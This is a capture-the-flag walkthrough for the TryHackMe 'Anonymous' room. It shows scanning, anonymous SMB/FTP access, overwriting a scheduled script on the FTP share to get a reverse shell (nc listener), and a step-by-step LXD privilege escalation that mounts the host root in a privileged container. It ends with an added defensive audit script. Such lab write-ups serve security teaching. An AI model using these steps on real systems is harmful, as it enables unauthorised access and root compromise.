# Anonymous

**Room Link:** <https://tryhackme.com/room/anonymous>

### Initial Scan

**Kali**

```
nmap -A $VICTIM
```


### Scan all ports

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```


### TCP/445 - SMB

**Kali**

```
smbclient -L //$VICTIM/
```


There were just two dog pics, probably not interesting.

**Kali**

```
mkdir loot
cd loot
smbclient \\\\$VICTIM\\pics
prompt
mget *
```

### TCP/21 - FTP

Log in as `anonymous` with no password.

**Kali**

```
ftp $VICTIM 21
binary
passive
cd scripts
mget *
```

## Initial Shell

There were these 3 files


I modified clean.sh to have a reverse shell back to my Kali.


**Kali #1**

```
nc -lvnp 1337
```

**Kali #2**

```
ftp $VICTIM 21
binary
passive
cd scripts
put clean.sh
```

After a few minutes the script was run and I had a shell.


Upgrade to an interactive shell with autocomplete:

```
python -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell
stty raw -echo; fg
```

## Privilege Escalation

Followed this link on LXD privilege escalation.

**Link:** <https://www.hackingarticles.in/lxd-privilege-escalation/>

**Victim**

```
id
```


**Kali**

```
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81
```

**Note:** The `lxd init` command was run to resolve a storage pool issue; it may not always be needed.

**Victim**

```
cd /tmp
wget http://$KALI:81/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
```
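
The escalation above depends on two host conditions: a non-root account in the `lxd` group, and permission to create a privileged container with the host root mounted as a disk device. The following audit sketch is an added example, not part of the original walkthrough; the function names and the sample data (user `alice`, the group file and the `lxc config show` output) are constructed for illustration.

```shell
#!/bin/sh
# Added audit example (not from the walkthrough). Sample data is constructed.

# Print non-root supplementary members of the lxd group from group(5) input
# on stdin. Users whose primary GID is lxd's are not listed in this file.
lxd_group_members() {
    awk -F: '$1 == "lxd" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "root") print m[i]
    }'
}

# Read `lxc config show <container>` output on stdin and report a privileged
# container and each disk device whose source is the host root filesystem.
risky_lxc_config() {
    awk '
        /^devices:/ { indev = 1; next }
        /^[^ ]/     { indev = 0 }
        indev && /^  [^ ].*:$/ { dev = $1; sub(/:$/, "", dev) }
        indev && $1 == "source:" && $2 == "/"    { src[dev] = 1 }
        indev && $1 == "type:"   && $2 == "disk" { disk[dev] = 1 }
        $1 == "security.privileged:" && $2 ~ /^"?true"?$/ { print "privileged" }
        END { for (d in src) if (d in disk) print "host-root-disk:" d }
    '
}

# Constructed group file: alice is an unprivileged user in the lxd group.
SAMPLE_GROUP='root:x:0:
lxd:x:108:root,alice
sudo:x:27:'

# Constructed config matching the container settings used in this section.
SAMPLE_CONFIG='architecture: x86_64
config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false'

printf '%s\n' "$SAMPLE_GROUP"  | lxd_group_members
printf '%s\n' "$SAMPLE_CONFIG" | risky_lxc_config
```

On a real host, feed the functions `/etc/group` and the output of `lxc config show` for each container; any account listed by the first function should be treated as root-equivalent.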

